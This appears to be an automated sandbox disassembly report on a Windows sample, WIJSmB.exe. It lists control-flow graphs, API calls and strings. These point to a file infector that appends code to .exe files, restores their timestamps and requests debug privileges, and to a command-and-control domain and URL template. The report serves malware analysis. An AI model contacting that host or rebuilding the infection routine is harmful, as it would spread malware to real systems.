                                                                                                                  control_flow_graph 0 4a1e6e-4a1e95 call 4a2d60 3 4a1e9c-4a1eaa call 4a1df6 0->3 4 4a1e97 call 4a1d8a 0->4 8 4a2332 3->8 9 4a1eb0-4a1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 4a2338-4a233b 8->11 9->8 10 4a1edf-4a1f28 call 4a1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 18 4a1f2e-4a1f39 10->18 13 4a233d-4a2340 UnmapViewOfFile 11->13 14 4a2346-4a2349 11->14 13->14 16 4a234b-4a234e CloseHandle 14->16 17 4a2350-4a2354 14->17 16->17 19 4a2391-4a239a call 4a2d9b 17->19 20 4a2356-4a235b CloseHandle 17->20 18->8 21 4a1f3f-4a1f56 18->21 20->19 21->8 23 4a1f5c-4a1f64 21->23 23->8 25 4a1f6a-4a1f70 23->25 25->8 26 4a1f76-4a1f87 call 4a1c81 25->26 26->8 29 4a1f8d-4a1fa7 call 4a185b call 4a1c81 26->29 29->8 34 4a1fad-4a1fb4 29->34 35 4a1fb6-4a1fc5 call 4a1af9 34->35 36 4a2024-4a2045 34->36 35->36 43 4a1fc7-4a1fd2 35->43 36->8 38 4a204b-4a204e 36->38 40 4a2070-4a20f4 call 4a1af9 * 2 call 4a1c68 * 2 memset * 2 38->40 41 4a2050-4a2053 38->41 62 4a20f5-4a20fe 40->62 42 4a2056-4a205a 41->42 42->40 45 4a205c-4a2061 42->45 43->8 46 4a1fd8-4a1fe7 43->46 45->8 48 4a2067-4a206e 45->48 49 4a1fe9-4a1fec 46->49 50 4a1fef-4a2006 call 4a1af9 46->50 48->42 49->50 57 4a2008-4a200e call 4a1c68 50->57 58 4a2013-4a201e FlushViewOfFile 50->58 57->58 58->36 63 4a2130-4a2139 62->63 64 4a2100-4a2114 62->64 65 4a213c-4a2142 63->65 66 4a212d-4a212e 64->66 67 4a2116-4a212a 64->67 68 4a215c 65->68 69 4a2144-4a2150 65->69 66->62 67->66 72 4a215f-4a2162 68->72 70 4a2152-4a2154 69->70 71 4a2157-4a215a 69->71 70->71 71->65 73 4a2181-4a2184 72->73 74 4a2164-4a2171 72->74 77 4a218d-4a21ba call 4a1c68 73->77 78 4a2186 73->78 75 4a232a-4a232d 74->75 76 4a2177-4a217e 74->76 75->72 76->73 81 4a21bc-4a21d0 call 4a1c68 77->81 82 4a21d3-4a220b call 4a1c81 call 4a1c68 77->82 78->77 81->82 89 4a221b-4a221e 82->89 90 4a220d-4a2218 call 4a1c68 82->90 92 4a2220-4a2223 89->92 93 4a2226-4a2328 memcpy UnmapViewOfFile CloseHandle call 4a1b8a call 4a185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 4a1915 CloseHandle 89->93 90->89 92->93 93->11
                                                                                                                  APIs
                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,004A32B0,00000164,004A2986,?), ref: 004A1EB9
                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 004A1ECD
                                                                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 004A1EF3
                                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 004A1F07
                                                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 004A1F1D
                                                                                                                  • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 004A201E
                                                                                                                  • memset.MSVCRT ref: 004A20D8
                                                                                                                  • memset.MSVCRT ref: 004A20EA
                                                                                                                  • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A222D
                                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A2238
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A224A
                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22C6
                                                                                                                  • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22CB
                                                                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22DD
                                                                                                                  • WriteFile.KERNEL32(000000FF,004A4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A22F7
                                                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A230D
                                                                                                                  • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 004A2322
                                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,004A32B0,00000164,004A2986,?), ref: 004A2340
                                                                                                                  • CloseHandle.KERNEL32(?,?,004A32B0,00000164,004A2986,?), ref: 004A234E
                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,004A32B0,00000164,004A2986,?), ref: 004A2359
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                                                                  • String ID: .@J$5@J$<@J$C@J$m@J
                                                                                                                  • API String ID: 3043204753-3086561988
                                                                                                                  • Opcode ID: 19dfea2168a7da738ba05a32e86d3bed9282efb075ea2dcf1f1b446457451204
                                                                                                                  • Instruction ID: cfb1f6f0c01571b0b73c3e48f417ef77fec9afa439786a8bd06fac5f8f58f293
                                                                                                                  • Opcode Fuzzy Hash: 19dfea2168a7da738ba05a32e86d3bed9282efb075ea2dcf1f1b446457451204
                                                                                                                  • Instruction Fuzzy Hash: A1F18071900208EFCF10DFA8CD80AAEBBB5FF5A314F10852AE519A7661D778AD41DF58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 117 4a1973-4a199a PathFileExistsA 118 4a19a0-4a19aa 117->118 119 4a1ac7-4a1acc 117->119 120 4a19af-4a19c2 CreateFileA 118->120 121 4a1ace 119->121 122 4a1ad0-4a1ad5 119->122 125 4a1a28-4a1a36 GetFileSize 120->125 126 4a19c4-4a19d3 Sleep 120->126 121->122 123 4a1af0-4a1af6 122->123 124 4a1ad7-4a1ad9 122->124 124->123 128 4a1a38-4a1a3b 125->128 129 4a1a87-4a1a8b 125->129 126->120 127 4a19d5-4a1a0b call 4a185b wsprintfA CopyFileA 126->127 127->125 143 4a1a0d-4a1a26 CreateFileA 127->143 128->129 130 4a1a3d-4a1a51 VirtualAlloc 128->130 131 4a1a8d-4a1a90 CloseHandle 129->131 132 4a1a96-4a1a9a 129->132 130->129 134 4a1a53-4a1a57 130->134 131->132 135 4a1a9c 132->135 136 4a1aad-4a1ab1 132->136 138 4a1a59-4a1a6d ReadFile 134->138 139 4a1a80 134->139 140 4a1aa0-4a1aa7 DeleteFileA 135->140 141 4a1adb-4a1ae0 136->141 142 4a1ab3-4a1ab6 136->142 138->129 144 4a1a6f-4a1a7e 138->144 139->129 140->136 145 4a1ae2-4a1ae5 141->145 146 4a1ae7-4a1aec 141->146 142->119 147 4a1ab8-4a1ac1 VirtualFree 142->147 143->125 148 4a1a9e 143->148 144->138 144->139 145->146 146->123 149 4a1aee 146->149 147->119 148->140 149->123
                                                                                                                  APIs
                                                                                                                  • PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004A19C6
                                                                                                                  • wsprintfA.USER32 ref: 004A19EC
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
                                                                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65
                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 004A1A90
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 004A1AA7
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004A1AC1
                                                                                                                  Strings
                                                                                                                  • %s%.8X.data, xrefs: 004A19E6
                                                                                                                  • \NJ`NJ, xrefs: 004A1980
                                                                                                                  • C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A197C
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004A19DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                                                                                                  • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$\NJ`NJ
                                                                                                                  • API String ID: 716042067-777670406
                                                                                                                  • Opcode ID: d1c8e85c70ac02e5575c4558db71616caafe1746c52d367e754cf531a404ea28
                                                                                                                  • Instruction ID: ae5913ea1b44b9e3bcd64e65750bfa5b0e5e620c30565849483c9311d7d4996b
                                                                                                                  • Opcode Fuzzy Hash: d1c8e85c70ac02e5575c4558db71616caafe1746c52d367e754cf531a404ea28
                                                                                                                  • Instruction Fuzzy Hash: 43517E71A01219EFCF209F98CC84AAFBBB8FB16355F10456AF515E62A0D3789E40CB58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 150 4a28b8-4a28ff memset wsprintfA 151 4a29db-4a29df 150->151 152 4a2905-4a290d 150->152 152->151 153 4a2913-4a2919 152->153 154 4a291b-4a294c memset wsprintfA call 4a29e2 153->154 155 4a2956-4a2965 strrchr 153->155 158 4a2951 154->158 155->151 157 4a2967-4a2978 lstrcmpiA 155->157 159 4a297a-4a2981 call 4a1e6e 157->159 160 4a2988-4a2992 lstrcmpiA 157->160 158->151 163 4a2986 159->163 160->151 162 4a2994-4a299b 160->162 164 4a29ad-4a29c9 strstr 162->164 165 4a299d-4a29a3 162->165 163->151 166 4a29cb-4a29d1 call 4a239d 164->166 167 4a29d3-4a29d6 call 4a2692 164->167 165->164 168 4a29a5-4a29a7 lstrcpy 165->168 166->151 167->151 168->164
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004A28D3
                                                                                                                  • wsprintfA.USER32 ref: 004A28F7
                                                                                                                  • memset.MSVCRT ref: 004A2925
                                                                                                                  • wsprintfA.USER32 ref: 004A2940
                                                                                                                    • Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2A02
                                                                                                                    • Part of subcall function 004A29E2: wsprintfA.USER32 ref: 004A2A1A
                                                                                                                    • Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2A44
                                                                                                                    • Part of subcall function 004A29E2: lstrlen.KERNEL32(?), ref: 004A2A54
                                                                                                                    • Part of subcall function 004A29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 004A2A6C
                                                                                                                    • Part of subcall function 004A29E2: strrchr.MSVCRT ref: 004A2A7C
                                                                                                                    • Part of subcall function 004A29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004A2A9F
                                                                                                                    • Part of subcall function 004A29E2: lstrlen.KERNEL32(Documents and Settings), ref: 004A2AAE
                                                                                                                    • Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2AC6
                                                                                                                    • Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2ADA
                                                                                                                    • Part of subcall function 004A29E2: FindFirstFileA.KERNEL32(?,?), ref: 004A2AEF
                                                                                                                    • Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2B13
                                                                                                                  • strrchr.MSVCRT ref: 004A2959
                                                                                                                  • lstrcmpiA.KERNEL32(00000001,exe), ref: 004A2974
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                                                                  • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                                                                  • API String ID: 3004273771-898104377
                                                                                                                  • Opcode ID: d202ca8010fbc09a2aac46cacfd680ef5cb96d2feb45e35d746eab9a5ed9150e
                                                                                                                  • Instruction ID: 175bf26b1ebfafe392614dd8b311a4f8038c64b1c6688d0f487f15b1267a344f
                                                                                                                  • Opcode Fuzzy Hash: d202ca8010fbc09a2aac46cacfd680ef5cb96d2feb45e35d746eab9a5ed9150e
                                                                                                                  • Instruction Fuzzy Hash: 1B31D5B2A043087BDB209B69DC85FCB376C9B33714F140467F545A2180E6F8DAC4AB68

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 004A164F
                                                                                                                  • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 004A165B
                                                                                                                  • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,00000104), ref: 004A166E
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 004A16AC
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 004A16BD
                                                                                                                    • Part of subcall function 004A139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A13BC
                                                                                                                    • Part of subcall function 004A139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004A13DA
                                                                                                                    • Part of subcall function 004A139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004A1448
                                                                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A16E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$C:\Windows\system32$Documents and Settings
                                                                                                                  • API String ID: 123563730-3315693372
                                                                                                                  • Opcode ID: 31d6b1bd529877041895973b03254f652fd85ff622271755eac816c4552256f6
                                                                                                                  • Instruction ID: af82f99dc435e2d33dbb2743edeee3e47cdcfb642c9fb5c3fa78b26f704a3340
                                                                                                                  • Opcode Fuzzy Hash: 31d6b1bd529877041895973b03254f652fd85ff622271755eac816c4552256f6
                                                                                                                  • Instruction Fuzzy Hash: B511E9715051147BDB205FA59D4EF9F7E6DEBA7366F100027F20995070D6B84540C7BD

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 205 4a1000-4a1023 CreateFileA 206 4a1092-4a1096 205->206 207 4a1025-4a1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 4a107b-4a1085 207->208 209 4a1057-4a105f 207->209 212 4a108d-4a1091 CloseHandle 208->212 213 4a1087-4a108b CloseHandle 208->213 210 4a1061-4a106e call 4a17d0 209->210 211 4a1074-4a1075 UnmapViewOfFile 209->211 210->211 211->208 212->206 213->212
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGJ,http://%s:%d/%s/%s,004A10E8,?), ref: 004A1018
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 004A1029
                                                                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 004A1038
                                                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 004A104B
                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 004A1075
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004A108B
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A108E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                                                                  • String ID: HGJ$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                  • API String ID: 1223616889-3567748804
                                                                                                                  • Opcode ID: 0a84a2b95d12cee52be960dd082e198d21ab7c667d9fb9ac80f8cf6d29372931
                                                                                                                  • Instruction ID: 656c2955edea3cab01e014da4b4327c8388165cd610bfb00bd6024290c29b8fd
                                                                                                                  • Opcode Fuzzy Hash: 0a84a2b95d12cee52be960dd082e198d21ab7c667d9fb9ac80f8cf6d29372931
                                                                                                                  • Instruction Fuzzy Hash: 710196B110835CBFE7305F609C88E2BBFACDB4679AF00453AF245A25A0E6745E448B78

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 374 4a2c48-4a2c75 memset call 4a1973 377 4a2cb2-4a2cb9 374->377 378 4a2c77-4a2c7f 374->378 381 4a2cbb-4a2cc2 VirtualFree 377->381 382 4a2cc8-4a2ccc 377->382 379 4a2c8f-4a2cac CreateThread WaitForMultipleObjects 378->379 380 4a2c81-4a2c8b 378->380 379->377 380->379 381->382
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004A2C57
                                                                                                                    • Part of subcall function 004A1973: PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
                                                                                                                    • Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
                                                                                                                    • Part of subcall function 004A1973: Sleep.KERNEL32(00000064), ref: 004A19C6
                                                                                                                    • Part of subcall function 004A1973: wsprintfA.USER32 ref: 004A19EC
                                                                                                                    • Part of subcall function 004A1973: CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
                                                                                                                    • Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
                                                                                                                    • Part of subcall function 004A1973: GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
                                                                                                                    • Part of subcall function 004A1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
                                                                                                                    • Part of subcall function 004A1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 004A2C99
                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,004A16BA,00000001,000000FF,?,004A16BA,00000000), ref: 004A2CAC
                                                                                                                  • VirtualFree.KERNEL32(01420000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,004A4E5C,004A4E60,?,004A16BA,00000000), ref: 004A2CC2
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A2C69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                  • API String ID: 2042498389-2915634642
                                                                                                                  • Opcode ID: 5eec8823fa7b435f43fd355ff30cb99eca04730c8770c55903686d8f93b61173
                                                                                                                  • Instruction ID: 46a2c13bd5f493bd618343f3fa27689de12fb732d42dd692ce5eb8876fd89481
                                                                                                                  • Opcode Fuzzy Hash: 5eec8823fa7b435f43fd355ff30cb99eca04730c8770c55903686d8f93b61173
                                                                                                                  • Instruction Fuzzy Hash: AB0184716412207BD7109BA99C0AF9F7E5CEFA7B60F104126B505D61C1E6E49A00C7BD

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 383 4a14e1-4a14fb 384 4a14fd-4a1510 GetModuleHandleA 383->384 385 4a1541-4a1547 383->385 386 4a151a-4a1535 VirtualQuery 384->386 387 4a1512-4a1518 384->387 388 4a1549-4a154c 385->388 389 4a1573-4a1574 call 4a1638 385->389 391 4a153b 386->391 392 4a1537-4a1539 386->392 387->385 393 4a1569-4a1570 388->393 394 4a154e-4a1555 388->394 395 4a1579-4a157a ExitProcess 389->395 391->385 392->385 392->391 394->393 396 4a1557-4a1566 call 4a1af9 394->396 396->393
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 004A1504
                                                                                                                  • VirtualQuery.KERNEL32(004A14E1,?,0000001C), ref: 004A1525
                                                                                                                  • ExitProcess.KERNEL32 ref: 004A157A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3946701194-0
                                                                                                                  • Opcode ID: 339c919201c7d80cad9f856c8072d97b29edfa2b04ef60e3dc7e926b754a2f4e
                                                                                                                  • Instruction ID: f02cf40b647f6c87703f55eaef5e39227ebf6b5382b5c48290bd413ae3626294
                                                                                                                  • Opcode Fuzzy Hash: 339c919201c7d80cad9f856c8072d97b29edfa2b04ef60e3dc7e926b754a2f4e
                                                                                                                  • Instruction Fuzzy Hash: 72113371D41214EFCB11DF65A88567E7BBCE7E6765F10403BF402E2260E27889419B5D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 399 4a1915-4a1922 400 4a1928-4a192c 399->400 401 4a1924-4a1926 399->401 402 4a192e-4a194d memset GetFileTime 400->402 403 4a194f-4a1952 400->403 404 4a196e-4a1970 401->404 405 4a1966-4a1968 402->405 403->404 406 4a1954-4a1960 SetFileTime 403->406 407 4a196a 405->407 408 4a196c 405->408 406->405 407->408 408->404
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileTimememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 176422537-0
                                                                                                                  • Opcode ID: a8b3315d8874cfe2f4e9bcabad00ca0c9216bba57996b7a4c1c79ef0c56ef13f
                                                                                                                  • Instruction ID: f35de81467fd401e512d49ba6a9a3340048715651704721b67568cb6d050ea92
                                                                                                                  • Opcode Fuzzy Hash: a8b3315d8874cfe2f4e9bcabad00ca0c9216bba57996b7a4c1c79ef0c56ef13f
                                                                                                                  • Instruction Fuzzy Hash: 2AF06872200209BBD720DE26DC04BA77BECAB62761F00853BF526D5160E774D645DBB5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
